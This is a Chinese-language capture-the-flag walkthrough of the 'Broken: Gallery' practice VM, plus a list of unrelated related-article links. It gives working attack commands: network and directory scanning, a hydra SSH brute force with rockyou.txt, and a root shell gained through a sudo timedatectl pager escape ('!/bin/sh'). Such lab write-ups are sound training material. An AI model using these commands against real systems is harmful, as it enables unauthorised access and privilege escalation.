Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
少年已不再年少年轻以化为青年3 分钟前
VirtualBox下虚拟机即可访问互联网,又可访问主机
运维·服务器·网络
爱奥尼欧5 分钟前
【Linux笔记】网络部分——数据链路层mac-arp
linux·网络·笔记
QT 小鲜肉15 分钟前
【Git、GitHub、Gitee】按功能分类汇总Git常用命令详解(超详细)
c语言·网络·c++·git·qt·gitee·github
DeamoTech31 分钟前
IEC101协议解析工具
网络
一抓掉一大把41 分钟前
秒杀-订单创建消费者CreateOrderConsumer
网络·数据库
杰克逊的日记44 分钟前
网段并网,打通网络
网络·智能路由器·并网
戴草帽的大z1 小时前
在 rk3588上通过网络命名空间实现 eth0/eth1 网卡隔离与程序独立部署
linux·网络·rk3588·ip·iproute·网卡隔离·ip netns
Ronin3051 小时前
【Linux网络】应用层协议HTTP
linux·网络·http·应用层协议
开开心心就好2 小时前
微软官方出品:免费数据恢复工具推荐
网络·笔记·microsoft·pdf·word·音视频·symfony
Felven2 小时前
飞腾D3000自带10G网卡调试
网络·飞腾·d3000·10g网卡
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件05Linux下V2Ray安装配置指南06jdk21下载、安装(Windows、Linux、macOS)07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08《大数据技术原理与应用》实验报告三 熟悉HBase常用操作09PyCharm 社区版全平台安装指南10npm使用国内淘宝镜像的方法